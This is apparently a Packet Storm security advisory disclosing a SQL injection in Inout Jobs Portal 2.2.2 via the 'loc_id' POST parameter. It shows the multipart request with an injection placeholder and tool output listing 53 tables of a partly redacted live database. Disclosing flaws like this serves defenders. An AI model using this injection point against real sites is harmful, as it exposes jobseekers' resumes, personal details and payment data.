Inout Jobs Portal version 2.2.2 suffers from a remote SQL injection vulnerability.
9f8b4b7af85a0ac5ff2162e8db5b902d70686fae9043406cbad209c183367ccf┌┌───────────────────────────────────────────────────────────────────────────────────────┐
││ C r a C k E r ┌┘
┌┘ T H E C R A C K O F E T E R N A L M I G H T ││
└───────────────────────────────────────────────────────────────────────────────────────┘┘
┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘ [ Vulnerability ] ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
: Author : CraCkEr :
│ Website : inoutscripts.com │
│ Vendor : Inout Scripts - Nesote Technologies Private Limited │
│ Software : Inout Jobs Portal 2.2.2 │
│ Vuln Type: SQL Injection │
│ Impact : Database Access │
│ │
│────────────────────────────────────────────────────────────────────────────────────────│
│ ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
: :
│ Release Notes: │
│ ═════════════ │
│ │
│ SQL injection attacks can allow unauthorized access to sensitive data, modification of │
│ data and crash the application or make it unavailable, leading to lost revenue and │
│ damage to a company reputation │
│ │
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘ ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
Greets:
The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL
CryptoJob (Twitter) twitter.com/CryptozJob
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘ © CraCkEr 2023 ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
Path: /index.php?page=jobs/searchresult
Method: POST
POST parameter 'loc_id' is vulnerable to SQLI
+-----------------------------------------------------------+
-----------------------------245625052541747605171577107419
Content-Disposition: form-data; name="search_query"
web
-----------------------------245625052541747605171577107419
Content-Disposition: form-data; name="c_id"
1
-----------------------------245625052541747605171577107419
Content-Disposition: form-data; name="loc_id"
1[INJECT-HERE]
-----------------------------245625052541747605171577107419
Content-Disposition: form-data; name="serchtype"
simple
-----------------------------245625052541747605171577107419
Content-Disposition: form-data; name="c_id"
0
-----------------------------245625052541747605171577107419
+-----------------------------------------------------------+
[INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.6
[INFO] fetching tables for database: '*****_jobs_portal'
Database: *****_jobs_portal
[53 tables]
+-----------------------------------------+
| nesote_inoutscripts_company_ratereview |
| nesote_inoutscripts_homepage_banner |
| nesote_inoutscripts_users |
| nesote_jobportal_admin |
| nesote_jobportal_applied_jobs |
| nesote_jobportal_city |
| nesote_jobportal_client_logs |
| nesote_jobportal_company_size |
| nesote_jobportal_company_type |
| nesote_jobportal_companyblock |
| nesote_jobportal_contents |
| nesote_jobportal_country |
| nesote_jobportal_coverletters |
| nesote_jobportal_currency |
| nesote_jobportal_email_templates |
| nesote_jobportal_employer_details |
| nesote_jobportal_employer_feedback |
| nesote_jobportal_functional_role |
| nesote_jobportal_industry |
| nesote_jobportal_ip_012023 |
| nesote_jobportal_ip_022020 |
| nesote_jobportal_ip_032020 |
| nesote_jobportal_ip_042020 |
| nesote_jobportal_ip_082021 |
| nesote_jobportal_ip_092022 |
| nesote_jobportal_ip_102022 |
| nesote_jobportal_ip_112022 |
| nesote_jobportal_ip_122022 |
| nesote_jobportal_ipn |
| nesote_jobportal_job_types |
| nesote_jobportal_jobs |
| nesote_jobportal_jobseeker_details |
| nesote_jobportal_languages |
| nesote_jobportal_locations |
| nesote_jobportal_messages |
| nesote_jobportal_months_messages |
| nesote_jobportal_news_and_events |
| nesote_jobportal_notifications |
| nesote_jobportal_packages |
| nesote_jobportal_payment_details |
| nesote_jobportal_previous_exp |
| nesote_jobportal_qualifications |
| nesote_jobportal_resumes |
| nesote_jobportal_saved_jobs |
| nesote_jobportal_saved_resumes |
| nesote_jobportal_seekers_qualifications |
| nesote_jobportal_sent_jobalerts |
| nesote_jobportal_settings |
| nesote_jobportal_skills |
| nesote_jobportal_specifications |
| nesote_jobportal_states |
| nesote_jobportal_success_story |
| nesote_jobportal_themes |
+-----------------------------------------+
[-] Done
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed